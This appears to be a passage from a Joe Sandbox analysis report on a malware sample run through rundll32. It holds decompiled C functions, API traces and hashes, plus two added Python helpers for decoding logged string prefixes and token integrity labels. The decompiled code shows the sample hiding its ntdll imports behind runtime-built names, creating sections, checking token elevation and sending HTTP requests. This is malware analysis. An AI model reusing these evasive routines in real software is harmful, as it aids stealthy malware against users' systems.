                                            • Instruction Fuzzy Hash: EE313CB2900209AFDB10EFA4CC88E9EBFBCEB48358F1444B5EA05A7111D775AD45DB50
                                            Uniqueness

                                            Uniqueness Score: -1.00%
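The API lists above show the sample resolving its imports on strings it builds at runtime (GetModuleHandleA.KERNEL32(4C44544E,...), GetProcAddress.KERNEL32(00000000,7243775A), ...). The sandbox prints only the DWORD found at each argument address, as a number, so the first four characters of every name are recoverable from the report alone. The Python below is an added example written for this page, not code from the sample or from Joe Sandbox: it parses lines copied from the lists above (embedded as SAMPLE_LINES), reverses the byte order of each argument and keeps only those that decode to printable ASCII or to a UTF-16LE pair such as the 0070006F passed to SysAllocString. All function and variable names are the example's own.

```python
"""Recover the 4-byte string prefixes that Joe Sandbox logs as DWORD arguments.

Added example, not part of the report. The log shows the little-endian DWORD at
the argument address formatted as big-endian hex, so the first character of the
string is the LAST hex pair. Four characters are enough to recognise the
ntdll/kernel32 families being resolved ("ZwCr", "ZwMa", "Wow6", ...).
"""
import re
from typing import Dict, List, Optional, Tuple

# Constructed input: lines copied from the "APIs" lists of this report.
SAMPLE_LINES = """
Part of subcall function 049F74E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000), ref: 049F7505
Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 049F7527
Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 049F753D
Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049F7553
Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049F7569
Part of subcall function 049F74E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049F757F
GetModuleHandleA.KERNEL32(4E52454B,04F78CEF,73797325), ref: 049F2424
Part of subcall function 049F37E9: GetProcAddress.KERNEL32(36776F57,049F3ECD), ref: 049F3804
SysAllocString.OLEAUT32(0070006F), ref: 049F3C6E
"""

API_CALL = re.compile(
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>\w+)\((?P<args>[^)]*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)


def decode_dword(hex_arg: str) -> Optional[str]:
    """Return the four characters a DWORD argument spells in memory, or None.

    Accepts plain ASCII ("ZwCr") and a UTF-16LE pair ("xx00yy00" -> "xy").
    Handles, lengths and pointers fail the printability test and yield None.
    """
    if len(hex_arg) != 8:
        return None
    try:
        raw = bytes.fromhex(hex_arg)[::-1]  # back to memory (little-endian) order
    except ValueError:
        return None
    if all(0x20 <= b < 0x7F for b in raw):
        return raw.decode("ascii")
    if raw[1] == raw[3] == 0 and all(0x20 <= b < 0x7F for b in (raw[0], raw[2])):
        return raw.decode("utf-16-le")
    return None


def parse_api_log(text: str) -> List[Tuple[str, str, str, Dict[str, str]]]:
    """Parse API lines into (api, module, ref, {hex_arg: decoded_prefix}).

    Only arguments that decode to text are kept, so a pointer such as
    04F78CEF is dropped rather than mis-read as a string.
    """
    calls = []
    for line in text.splitlines():
        m = API_CALL.search(line)
        if not m:
            continue
        decoded = {}
        for arg in (a.strip() for a in m.group("args").split(",")):
            prefix = decode_dword(arg)
            if prefix is not None:
                decoded[arg] = prefix
        calls.append((m.group("api"), m.group("module"), m.group("ref"), decoded))
    return calls


def name_prefixes(text: str) -> List[str]:
    """Sorted, de-duplicated prefixes passed to the import-resolution APIs."""
    found = set()
    for api, _module, _ref, decoded in parse_api_log(text):
        if api in ("GetProcAddress", "GetModuleHandleA", "GetModuleHandleW"):
            found.update(decoded.values())
    return sorted(found)


if __name__ == "__main__":
    for api, module, ref, decoded in parse_api_log(SAMPLE_LINES):
        print(f"{ref}: {module}!{api} {decoded}")
    print("prefixes:", name_prefixes(SAMPLE_LINES))
```

Only four characters are visible, and "ZwCr" or "RtlN" is compatible with more than one ntdll export, so treat the output as a lead for the Yara hits and the memory dumps listed in the report, not as a resolved import table.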

                                            APIs
                                              • Part of subcall function 0581CC5D: memset.NTDLL ref: 0581CC67
                                            • OpenEventA.KERNEL32(00000002,00000000,05829314,?,00000000,00000000,?,05816085,?,?,?,?,?,?,?,0580BF69), ref: 05819038
                                            • SetEvent.KERNEL32(00000000,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05819045
                                            • Sleep.KERNEL32(00000BB8,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05819050
                                            • ResetEvent.KERNEL32(00000000,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 05819057
                                            • CloseHandle.KERNEL32(00000000,?,05816085,?,?,?,?,?,?,?,0580BF69,?,?,?,?,?), ref: 0581905E
                                            • GetShellWindow.USER32 ref: 05819069
                                            • GetWindowThreadProcessId.USER32(00000000), ref: 05819070
                                              • Part of subcall function 058050FB: RegCloseKey.ADVAPI32(?,?,?), ref: 0580517E
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: Event$CloseWindow$HandleOpenProcessResetShellSleepThreadmemset
                                            • String ID:
                                            • API String ID: 53838381-0
                                            • Opcode ID: b3a97f1b8919a8cc9ffd7c6073df49215459f6f83fa1daebf73eeb6d7853df8d
                                            • Instruction ID: 0411a55cf13dfc48e01f7a7bab81fd596082da31cce7900af1ff366f8df6585f
                                            • Opcode Fuzzy Hash: b3a97f1b8919a8cc9ffd7c6073df49215459f6f83fa1daebf73eeb6d7853df8d
                                            • Instruction Fuzzy Hash: 85216272314210ABC63166AAEC4EE6B7F6DABC9A10F01C405FD0AC7150DF356C418BBA
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                             			E049F7628(long* _a4) { // returns TokenIsElevated; stores the integrity-level RID in *_a4
                                             				long _v8;     // returned length, reused
                                             				void* _v12;   // process token
                                             				void _v16;    // TOKEN_ELEVATION.TokenIsElevated
                                             				long _v20;    // integrity RID
                                             				int _t33;
                                             				void* _t46;
                                             
                                             				_v16 = 1;       // defaults when the query is skipped or fails:
                                             				_v20 = 0x2000;  // elevated, SECURITY_MANDATORY_MEDIUM_RID
                                             				// Global compared against 5; the APIs below only exist from Vista (6.0), so this reads as an OS major-version check.
                                             				if( *0x49fa2fc > 5) {
                                             					_v16 = 0;
                                             					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) { // GetCurrentProcess() pseudo-handle, TOKEN_READ
                                             						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed  0x14 = TokenElevation; result not checked
                                             						_v8 = 0;
                                             						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed  0x19 = TokenIntegrityLevel, size query
                                             						if(_v8 != 0) {
                                             							_t46 = E049F4DF6(_v8); // RtlAllocateHeap
                                             							if(_t46 != 0) {
                                             								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed  fills a TOKEN_MANDATORY_LABEL
                                             								if(_t33 != 0) {
                                             									// *_t46 is Label.Sid; the last sub-authority of S-1-16-<rid> is the integrity RID
                                             									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                                             								}
                                             								E049F4C73(_t46); // RtlFreeHeap
                                             							}
                                             						}
                                             						CloseHandle(_v12);
                                             					}
                                             				}
                                             				 *_a4 = _v20;
                                             				return _v16;
                                             			}

                                            APIs
                                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 049F765A
                                             • GetTokenInformation.KERNELBASE(00000000,00000014(TokenElevation),00000001,00000004,?,00000000), ref: 049F767A
                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 049F768A
                                            • CloseHandle.KERNEL32(00000000), ref: 049F76DA
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 049F76AD
                                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 049F76B5
                                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 049F76C5
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                                            • String ID:
                                            • API String ID: 1295030180-0
                                            • Opcode ID: aa373d02d35a8766f4fbc9a543013679f59472d17857a5b5fe5edd118ba63c02
                                            • Instruction ID: 81e9d4edfa4af6e5b871e64bed65ab571061fc6014c1c0894068de4739cf44cd
                                            • Opcode Fuzzy Hash: aa373d02d35a8766f4fbc9a543013679f59472d17857a5b5fe5edd118ba63c02
                                            • Instruction Fuzzy Hash: 22212875900209BFEB10AF94DD84EEEBFBDEB49344F1000B5EA10A6260D7756E54EB64
                                            Uniqueness

                                            Uniqueness Score: -1.00%
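E049F7628 above decides whether the process is elevated and which integrity level it runs at, with fixed fallbacks (elevated = 1, RID 0x2000) whenever the query is skipped or fails. The Python below is an added example, not code from the sample or from the report: it reproduces that decision on a raw TOKEN_MANDATORY_LABEL buffer, so the same logic can be applied to bytes carved from one of the memory dumps instead of a live token. The 32-bit structure layout, the base address 0x002A1000 and the sample RIDs are constructed for the example; INTEGRITY_LEVELS holds the documented SECURITY_MANDATORY_*_RID values, and every function name is the example's own.

```python
"""Parse a TOKEN_MANDATORY_LABEL buffer and recover the integrity level.

Added example mirroring E049F7628: GetTokenInformation(TokenIntegrityLevel)
returns {PSID Sid; DWORD Attributes} with the SID stored inline after the
header, and the integrity RID is the SID's last sub-authority
(GetSidSubAuthority(sid, GetSidSubAuthorityCount(sid) - 1)).
"""
import struct
from typing import List, Tuple

# SECURITY_MANDATORY_*_RID values: last sub-authority of S-1-16-<rid>
INTEGRITY_LEVELS = {
    0x0000: "Untrusted",
    0x1000: "Low",
    0x2000: "Medium",
    0x2100: "Medium Plus",
    0x3000: "High",
    0x4000: "System",
    0x5000: "Protected Process",
}
SE_GROUP_INTEGRITY = 0x20
SE_GROUP_INTEGRITY_ENABLED = 0x40


def build_mandatory_label(rid: int, base_addr: int) -> bytes:
    """Constructed TOKEN_MANDATORY_LABEL in 32-bit layout: an 8-byte header
    {PSID Sid; DWORD Attributes} followed by S-1-16-<rid>, with Sid pointing
    at base_addr + 8 (base_addr is where the buffer is assumed to live)."""
    sid = struct.pack("<BB", 1, 1) + bytes([0, 0, 0, 0, 0, 16]) + struct.pack("<I", rid)
    header = struct.pack("<II", base_addr + 8, SE_GROUP_INTEGRITY | SE_GROUP_INTEGRITY_ENABLED)
    return header + sid


def parse_sid(buf: bytes, off: int = 0) -> Tuple[str, List[int]]:
    """Decode a binary SID: Revision, SubAuthorityCount, 48-bit big-endian
    IdentifierAuthority, then SubAuthorityCount little-endian DWORDs."""
    revision, count = buf[off], buf[off + 1]
    if revision != 1:
        raise ValueError(f"unsupported SID revision {revision}")
    if off + 8 + 4 * count > len(buf):
        raise ValueError("SID truncated")
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = [struct.unpack_from("<I", buf, off + 8 + 4 * i)[0] for i in range(count)]
    parts = [f"S-{revision}-{authority}"] + [str(s) for s in subs]
    return "-".join(parts), subs


def integrity_rid_from_label(buf: bytes, base_addr: int) -> int:
    """Follow Label.Sid into the buffer and return the SID's last sub-authority,
    i.e. the decompiled *GetSidSubAuthority(*label, count - 1)."""
    psid, _attributes = struct.unpack_from("<II", buf, 0)
    off = psid - base_addr
    if not 0 <= off < len(buf):
        raise ValueError("Label.Sid does not point into the buffer")
    _sid_str, subs = parse_sid(buf, off)
    if not subs:
        raise ValueError("SID has no sub-authorities")
    return subs[-1]


def integrity_name(rid: int) -> str:
    """Windows compares labels numerically, so report the highest defined level
    that does not exceed rid (0x2050 is still 'Medium')."""
    return INTEGRITY_LEVELS[max(k for k in INTEGRITY_LEVELS if k <= rid)]


def elevation_check(os_major: int, token_is_elevated: int,
                    label: bytes, base_addr: int) -> Tuple[int, int]:
    """Same decision as E049F7628: with OS major <= 5 report (elevated=1, 0x2000)
    without querying; otherwise return the token's elevation flag and the RID,
    falling back to 0x2000 (Medium) if the label cannot be read."""
    if os_major <= 5:
        return 1, 0x2000
    try:
        rid = integrity_rid_from_label(label, base_addr)
    except ValueError:
        rid = 0x2000
    return token_is_elevated, rid


if __name__ == "__main__":
    base = 0x002A1000  # hypothetical address the buffer was read from
    for rid in (0x1000, 0x2000, 0x3000):
        buf = build_mandatory_label(rid, base)
        got = integrity_rid_from_label(buf, base)
        print(hex(got), integrity_name(got), parse_sid(buf, 8)[0])
```

The caller supplies token_is_elevated here; in the decompiled code it is 0 unless the TokenElevation query succeeds, because that call's return value is never checked, while a failed integrity query silently reports Medium. Both quirks matter when reasoning about which branch the sample takes in a given sandbox configuration.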

                                            C-Code - Quality: 64%
                                            			E049F3739(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                            				intOrPtr _v8;
                                            				intOrPtr _t9;
                                            				intOrPtr _t13;
                                            				char* _t19;
                                            				char* _t28;
                                            				void* _t33;
                                            				void* _t34;
                                            				char* _t36;
                                            				void* _t38;
                                            				intOrPtr* _t39;
                                            				char* _t40;
                                            				char* _t42;
                                            				char* _t43;
                                            
                                             				_t34 = __edx;
                                             				_push(__ecx);
                                             				_t9 =  *0x49fa348; // 0x57d5a8 (base of the string table)
                                             				_t1 = _t9 + 0x49fb62c; // 0x253d7325 = "%s=%": a printf-style template for a "key=value" string
                                             				_t36 = 0;
                                             				_t28 = E049F403D(__ecx, _t1); // sprintf of the template into a heap buffer (see API list)
                                             				if(_t28 != 0) {
                                             					_t39 = __imp__; // lstrlen
                                             					_t13 =  *_t39(_t28, _t38);
                                             					_v8 = _t13;
                                             					_t40 = E049F4DF6(_v8 +  *_t39(_a4) + 1); // RtlAllocateHeap: lstrlen(prefix) + lstrlen(_a4) + NUL
                                             					if(_t40 != 0) {
                                             						strcpy(_t40, _t28);
                                             						_pop(_t33);
                                             						__imp__(_t40, _a4); // lstrcat: append the caller-supplied string
                                             						_t19 = E049F723B(_t33, _t34, _t40, _a8); // executed
                                             						_t36 = _t19;
                                             						E049F4C73(_t40); // RtlFreeHeap
                                             						_t42 = E049F20D2(StrTrimA(_t36, "="), _t36); // strip leading/trailing '=' and reformat with _snprintf
                                             						if(_t42 != 0) {
                                             							E049F4C73(_t36); // keep the new buffer, free the old one
                                             							_t36 = _t42;
                                             						}
                                             						_t43 = E049F72E7(_t36, _t33);
                                             						if(_t43 != 0) {
                                             							E049F4C73(_t36);
                                             							_t36 = _t43;
                                             						}
                                             					}
                                             					E049F4C73(_t28);
                                             				}
                                             				return _t36; // heap string owned by the caller, or 0 on failure
                                            			}

                                            APIs
                                              • Part of subcall function 049F403D: lstrlen.KERNEL32(00000000,00000000,00000000,75BCC740,?,?,?,049F3752,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F40A4
                                              • Part of subcall function 049F403D: sprintf.NTDLL ref: 049F40C5
                                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,75BCC740,?,?,049F653D,?,04F795B0), ref: 049F3764
                                            • lstrlen.KERNEL32(?,?,?,049F653D,?,04F795B0), ref: 049F376C
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • strcpy.NTDLL ref: 049F3783
                                            • lstrcat.KERNEL32(00000000,?), ref: 049F378E
                                              • Part of subcall function 049F723B: lstrlen.KERNEL32(?,?,?,00000000,?,049F379D,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F724C
                                              • Part of subcall function 049F4C73: RtlFreeHeap.NTDLL(00000000,00000000,049F55C4,00000000,?,?,00000000), ref: 049F4C7F
                                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,049F653D,?,04F795B0), ref: 049F37AB
                                              • Part of subcall function 049F20D2: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,049F37B7,00000000,?,?,049F653D,?,04F795B0), ref: 049F20DC
                                              • Part of subcall function 049F20D2: _snprintf.NTDLL ref: 049F213A
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                            • String ID: =
                                            • API String ID: 2864389247-1428090586
                                            • Opcode ID: 0d82541e2455ba97d017356558c65b277c8967446ebb1dc08ff4b0fa77e4cdf8
                                            • Instruction ID: 55caa5826dec43b41252465517c273d7af3be253c284fdf6e59c59c3479f396c
                                            • Opcode Fuzzy Hash: 0d82541e2455ba97d017356558c65b277c8967446ebb1dc08ff4b0fa77e4cdf8
                                            • Instruction Fuzzy Hash: 8B11E3739055242757226BB89C84CEF3A9C9ED46683050131FF00A7200DF78FD0187A0
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                              • Part of subcall function 049F1162: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,04F789D8,049F3C2E,?,?,?,?,?,?,?,?,?,?,?,049F3C2E), ref: 049F122F
                                              • Part of subcall function 049F6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 049F6652
                                              • Part of subcall function 049F6615: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 049F6683
                                            • SysAllocString.OLEAUT32(00000000), ref: 049F3C5A
                                            • SysAllocString.OLEAUT32(0070006F), ref: 049F3C6E
                                            • SysAllocString.OLEAUT32(00000000), ref: 049F3C80
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3CE8
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3CF7
                                            • SysFreeString.OLEAUT32(00000000), ref: 049F3D02
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                             • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                             • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: String$AllocFreeQueryUnknown_$Interface_Proxy$Service
                                            • String ID:
                                            • API String ID: 2831207796-0
                                            • Opcode ID: 3315dfccd5fc146b6d77fe2f939eac59ec244ffe502453ebaa5df1f456c16e21
                                            • Instruction ID: ef83f9767da0f8bc892074376b4cc982df8407e0c5a67e86f246464c6de009f1
                                            • Opcode Fuzzy Hash: 3315dfccd5fc146b6d77fe2f939eac59ec244ffe502453ebaa5df1f456c16e21
                                            • Instruction Fuzzy Hash: FE414F36900609AFDB11DFB8D844A9EB7BAEF89300F144436EE14EB220DA75AD05CB91
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            APIs
                                            • GetLastError.KERNEL32(00000000,?,?,?,00000000,058250B8,00000018,0580309A,00000000,?,?,?,?,00000000), ref: 0581FB35
                                            • VirtualProtect.KERNEL32(00000000,00000004,00000000,00000000,00000000,00000004,00000000,?,00000000,?,?,?,00000000,058250B8,00000018,0580309A), ref: 0581FBC0
                                            • RtlEnterCriticalSection.NTDLL(05829420), ref: 0581FBE9
                                            • RtlLeaveCriticalSection.NTDLL(05829420), ref: 0581FC07
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.421966249.0000000005800000.00000040.10000000.00040000.00000000.sdmp, Offset: 05800000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_5800000_rundll32.jbxd
                                            Yara matches
                                            Similarity
                                            • API ID: CriticalSection$EnterErrorLastLeaveProtectVirtual
                                            • String ID:
                                            • API String ID: 3666628472-0
                                            • Opcode ID: 1cfa50851ba34a68d7cc4911e768844e24bd52c48c905a07e978adb3d2bfca4b
                                            • Instruction ID: 669d827a9267be1d7c8a14cb6e6797b9bfb1847b4e352b78b8a7ace2e4eb00db
                                            • Opcode Fuzzy Hash: 1cfa50851ba34a68d7cc4911e768844e24bd52c48c905a07e978adb3d2bfca4b
                                            • Instruction Fuzzy Hash: 76415971A00719AFCB21DF65C888999BFF9FF48300B008529ED16D7260D734AD91CFA5
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F74E0(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                            				intOrPtr _v8;
                                            				intOrPtr _t23;
                                            				intOrPtr _t26;
                                            				_Unknown_base(*)()* _t28;
                                            				intOrPtr _t30;
                                            				_Unknown_base(*)()* _t32;
                                            				intOrPtr _t33;
                                            				_Unknown_base(*)()* _t35;
                                            				intOrPtr _t36;
                                            				_Unknown_base(*)()* _t38;
                                            				intOrPtr _t39;
                                            				_Unknown_base(*)()* _t41;
                                            				intOrPtr _t44;
                                            				struct HINSTANCE__* _t48;
                                            				intOrPtr _t54;
                                            
                                            				_t54 = E049F4DF6(0x20);
                                            				if(_t54 == 0) {
                                            					_v8 = 8;
                                            				} else {
                                            					_t23 =  *0x49fa348; // 0x57d5a8
                                            					_t1 = _t23 + 0x49fb11a; // 0x4c44544e
                                            					_t48 = GetModuleHandleA(_t1);
                                            					_t26 =  *0x49fa348; // 0x57d5a8
                                            					_t2 = _t26 + 0x49fb769; // 0x7243775a
                                            					_v8 = 0x7f;
                                            					_t28 = GetProcAddress(_t48, _t2);
                                            					 *(_t54 + 0xc) = _t28;
                                            					if(_t28 == 0) {
                                            						L8:
                                            						E049F4C73(_t54);
                                            					} else {
                                            						_t30 =  *0x49fa348; // 0x57d5a8
                                            						_t5 = _t30 + 0x49fb756; // 0x614d775a
                                            						_t32 = GetProcAddress(_t48, _t5);
                                            						 *(_t54 + 0x10) = _t32;
                                            						if(_t32 == 0) {
                                            							goto L8;
                                            						} else {
                                            							_t33 =  *0x49fa348; // 0x57d5a8
                                            							_t7 = _t33 + 0x49fb40b; // 0x6e55775a
                                            							_t35 = GetProcAddress(_t48, _t7);
                                            							 *(_t54 + 0x14) = _t35;
                                            							if(_t35 == 0) {
                                            								goto L8;
                                            							} else {
                                            								_t36 =  *0x49fa348; // 0x57d5a8
                                            								_t9 = _t36 + 0x49fb4d2; // 0x4e6c7452
                                            								_t38 = GetProcAddress(_t48, _t9);
                                            								 *(_t54 + 0x18) = _t38;
                                            								if(_t38 == 0) {
                                            									goto L8;
                                            								} else {
                                            									_t39 =  *0x49fa348; // 0x57d5a8
                                            									_t11 = _t39 + 0x49fb779; // 0x6c43775a
                                            									_t41 = GetProcAddress(_t48, _t11);
                                            									 *(_t54 + 0x1c) = _t41;
                                            									if(_t41 == 0) {
                                            										goto L8;
                                            									} else {
                                            										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                            										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                            										_t44 = E049F25D7(_t54, _a8); // executed
                                            										_v8 = _t44;
                                            										if(_t44 != 0) {
                                            											goto L8;
                                            										} else {
                                            											 *_a12 = _t54;
                                            										}
                                            									}
                                            								}
                                            							}
                                            						}
                                            					}
                                            				}
                                            				return _v8;
                                            			}


                                            APIs
                                              • Part of subcall function 049F4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,049F5522), ref: 049F4E02
                                            • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,049F23A0,?,?,?,?,00000000,00000000), ref: 049F7505
                                            • GetProcAddress.KERNEL32(00000000,7243775A), ref: 049F7527
                                            • GetProcAddress.KERNEL32(00000000,614D775A), ref: 049F753D
                                            • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 049F7553
                                            • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 049F7569
                                            • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 049F757F
                                              • Part of subcall function 049F25D7: NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,76C84EE0,00000000,00000000,049F759F), ref: 049F2634
                                              • Part of subcall function 049F25D7: memset.NTDLL ref: 049F2656
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_2_2_49f0000_rundll32.jbxd
                                            Similarity
                                            • API ID: AddressProc$AllocateCreateHandleHeapModuleSectionmemset
                                            • String ID:
                                            • API String ID: 3012371009-0
                                            • Opcode ID: ff28106a050fe6cc29caaad46bc229a53a3b4e259fd1e3dc4f6b04609a74e1d5
                                            • Instruction ID: 5185c4d4a8a142d7fbd32f6b1d6de7fea7a5a88b7bdfd3cfed3b63ee7c18429c
                                            • Opcode Fuzzy Hash: ff28106a050fe6cc29caaad46bc229a53a3b4e259fd1e3dc4f6b04609a74e1d5
                                            • Instruction Fuzzy Hash: F921EBB161070AAFEB10EFA9CC84E6ABBFCEF447547154476EA15C7221E7B4F9048B60
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            C-Code - Quality: 100%
                                            			E049F4BD6(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                            				void* __esi;
                                            				long _t10;
                                            				void* _t18;
                                            				void* _t22;
                                            
                                            				_t9 = __eax;
                                            				_t22 = __eax;
                                            				if(_a4 != 0) {
                                            					_t9 = E049F5296(__eax + 4, _t18, _a4, __eax, __eax + 4); // executed
                                            					if(_t9 == 0) {
                                            						L9:
                                            						return GetLastError();
                                            					}
                                            				}
                                            				_t10 = E049F7A71(_t9, _t18, _t22, _a8); // executed
                                            				if(_t10 == 0) {
                                            					ResetEvent( *(_t22 + 0x1c));
                                            					ResetEvent( *(_t22 + 0x20));
                                            					if(HttpSendRequestA( *(_t22 + 0x18), 0, 0xffffffff, 0, 0) != 0) {
                                            						SetEvent( *(_t22 + 0x1c));
                                            						goto L7;
                                            					} else {
                                            						_t10 = GetLastError();
                                            						if(_t10 == 0x3e5) {
                                            							L7:
                                            							_t10 = 0;
                                            						}
                                            					}
                                            				}
                                            				if(_t10 == 0xffffffff) {
                                            					goto L9;
                                            				}
                                            				return _t10;
                                            			}


                                            APIs
                                            • ResetEvent.KERNEL32(?,00000008,?,?,00000102,049F5388,?,?,00000000,00000000), ref: 049F4C10
                                            • ResetEvent.KERNEL32(?), ref: 049F4C15
                                            • HttpSendRequestA.WININET(?,00000000,000000FF,00000000,00000000), ref: 049F4C22
                                            • GetLastError.KERNEL32 ref: 049F4C2D
                                            • GetLastError.KERNEL32(?,?,00000102,049F5388,?,?,00000000,00000000), ref: 049F4C48
                                              • Part of subcall function 049F5296: lstrlen.KERNEL32(00000000,00000008,?,76C84D40,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?,?,00000000), ref: 049F52A2
                                              • Part of subcall function 049F5296: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,049F4BF5,?,?,?,?,00000102,049F5388,?), ref: 049F5300
                                              • Part of subcall function 049F5296: lstrcpy.KERNEL32(00000000,00000000), ref: 049F5310
                                            • SetEvent.KERNEL32(?), ref: 049F4C3B
                                            Memory Dump Source
                                            • Source File: 00000002.00000002.420608030.00000000049F1000.00000020.10000000.00040000.00000000.sdmp, Offset: 049F0000, based on PE: true
                                            • Associated: 00000002.00000002.420596803.00000000049F0000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420674617.00000000049F9000.00000002.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420696991.00000000049FA000.00000004.10000000.00040000.00000000.sdmp
                                            • Associated: 00000002.00000002.420720076.00000000049FC000.00000002.10000000.00040000.00000000.sdmp
                                            Joe Sandbox IDA Plugin
